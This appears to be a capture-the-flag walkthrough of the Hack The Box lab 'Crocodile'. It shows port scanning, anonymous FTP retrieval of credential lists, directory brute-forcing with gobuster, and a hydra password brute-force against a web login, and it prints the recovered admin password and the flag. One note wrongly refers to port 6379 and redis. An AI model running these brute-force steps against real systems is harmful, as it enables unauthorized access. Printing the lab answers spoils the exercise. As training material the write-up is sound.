03.CROCODILE (FTP & WEB FORM LOGIN)

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 21,80
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
 |_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
 | ftp-syst: 
 |   STAT: 
 | FTP server status:
 |      Connected to ::ffff:10.10.14.51
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 2
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Smash - Bootstrap Business Template
 Service Info: OS: Unix

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln 10.129.1.15 -p 21,80
 PORT   STATE SERVICE
 21/tcp open  ftp
 80/tcp open  http
 | http-cookie-flags: 
 |   /login.php: 
 |     PHPSESSID: 
 |_      httponly flag not set
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 | http-csrf: 
 | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.1.15
 |   Found the following possible CSRF vulnerabilities: 
 |     
 |     Path: http://10.129.1.15:80/
 |     Form id: contact-form
 |     Form action: assets/contact.php
 |     
 |     Path: http://10.129.1.15:80/index.html
 |     Form id: contact-form
 |_    Form action: assets/contact.php
 | http-enum: 
 |   /login.php: Possible admin folder
 |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
 |_  /js/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD/COMPROMISE

Submit root flag

root@htb:~$ ftp {targetIP}
Name (targetIP}:{username}: anonymous
 * the anonymous username accepts ANY password given to it!
 
ftp> help
 * the get cmd is used to download files from the ftp server
 
ftp> dir
 229 Entering Extended Passive Mode (|||46072|)
 150 Here comes the directory listing.
 -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
 -rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
 226 Directory send OK.
 
ftp> get allowed.userlist
 local: allowed.userlist remote: allowed.userlist
 229 Entering Extended Passive Mode (|||43958|)
 150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
 100% |*************************************************************************************************************************************************|    33       12.67 KiB/s    00:00 ETA
 226 Transfer complete.
 33 bytes received in 00:00 (2.50 KiB/s)
 
ftp> get allowed.userlist.passwd
 local: allowed.userlist.passwd remote: allowed.userlist.passwd
 229 Entering Extended Passive Mode (|||47005|)
 150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
 100% |*************************************************************************************************************************************************|    62       42.42 KiB/s    00:00 ETA
 226 Transfer complete.
 62 bytes received in 00:00 (6.23 KiB/s) 
 
ftp> exit
 221 Goodbye.

root@htb:~$ cat allowed.userlist
 aron
 pwnmeow
 egotisticalsw
 admin
 
root@htb:~$ cat allowed.userlist.passwd 
 root
 Supersecretpassword1
 @BaASD&9032123sADS
 rKXM59ESxesUFHAd
 
#walk the application
root@htb:~$ BROWSER > {targetSite:port} > Wappalyzer
 PHP, Apache 2.4.41
 
 * identify used technologies
 
root@htb:~$ BROWSER > {targetSite:port}
 * nothing interesting found
 
root@htb:~$ gobuster --help
 dir         Uses directory/file enumeration mode

root@htb:~$ gobuster dir --help
 -x, --extensions string                 File extension(s) to search for
 
 * --url : The target URL.
   --wordlist : Path to the wordlist.
   -x : File extension(s) to search for.
 
#perform directory brute force using gobuster
root@oco:~$ locate directory-list-2.3-small.txt
root@oco:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .
root@oco:~$ gobuster dir -u {targetIP} -w directory-list-2.3-small.txt -x php,html -t 100
 /login.php            (Status: 200) [Size: 1577]
 /assets               (Status: 301) [Size: 311] [--> http://10.129.1.15/assets/]
 /css                  (Status: 301) [Size: 308] [--> http://10.129.1.15/css/]
 /js                   (Status: 301) [Size: 307] [--> http://10.129.1.15/js/]
 /logout.php           (Status: 302) [Size: 0] [--> login.php]
 /config.php           (Status: 200) [Size: 0]
 /.html                (Status: 403) [Size: 276]
 /.php                 (Status: 403) [Size: 276]
 /index.html           (Status: 200) [Size: 58565]
 /fonts                (Status: 301) [Size: 310] [--> http://10.129.1.15/fonts/]
 /dashboard            (Status: 301) [Size: 314] [--> http://10.129.1.15/dashboard/]
 /.php                 (Status: 403) [Size: 276]
 /.html                (Status: 403) [Size: 276]
 Progress: 262992 / 262995 (100.00%)
 ===============================================================
 Finished
 ===============================================================

 * the -x php,html will filter out extensions that aren't php or html

#identify the parameter for brute-forcing
root@htb:~$ burpsuite
root@htb:~$ BROWSER > FoxyProxy > Burp
root@htb:~$ BURP SUITE > Proxy > Intercept is on
root@htb:~$ BROWSER > {targetSite:port}/login.php
 username field: {arbitraryValue}
 password field: {arbitraryValue}
 * submit the expected user input
 
BURP > Proxy
 Request
 ...
 POST /login.php HTTP/1.1
 Host: 10.129.1.15
 Content-Length: 40
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 Origin: http://10.129.1.15
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Referer: http://10.129.1.15/login.php
 Accept-Encoding: gzip, deflate, br
 Accept-Language: en-US,en;q=0.9
 Cookie: PHPSESSID=oskkjq0gr65emmvjufor4u765c
 Connection: close

 Username=null&Password=null&Submit=Login

 * Send to repeater and identify error msgs
 
BURP > Repeater
 Request
 ...
 POST /login.php HTTP/1.1
 Host: 10.129.1.15
 Content-Length: 40
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 Origin: http://10.129.1.15
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Referer: http://10.129.1.15/login.php
 Accept-Encoding: gzip, deflate, br
 Accept-Language: en-US,en;q=0.9
 Cookie: PHPSESSID=oskkjq0gr65emmvjufor4u765c
 Connection: close

 Username=null&Password=null&Submit=Login
 
 Response
 ...
 <strong>Warning!</strong> Incorrect information.

#brute force login 01.default credentials, 02.tailored list, 03,leaked passwords, etc

root@htb:~$ hydra -L allowed.userlist -P allowed.userlist.passwd 10.129.1.15 http-post-form "/login.php:username=^USER^&password=^PASS^:F=Warning! Incorrect information."
 * ALT: ffuf -w allowed.userlist:USER -w allowed.userlist.passwd:PASS -u http://10.129.1.15/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "Username=USER&Password=PASS" -fr "Warning! Incorrect information."
    - admin:rKXM59ESxesUFHAd

root@htb:~$ BROWSER > {targetSite:port}
 * Here is your flag: c7110277ac44d78b6a9fff2232434d16

Previous02.SEQUEL (MYSQL)Next04.RESPONDER (RFI, NTLM CAPTURE, PW CRACKING & WINRM)

Last updated 6 months ago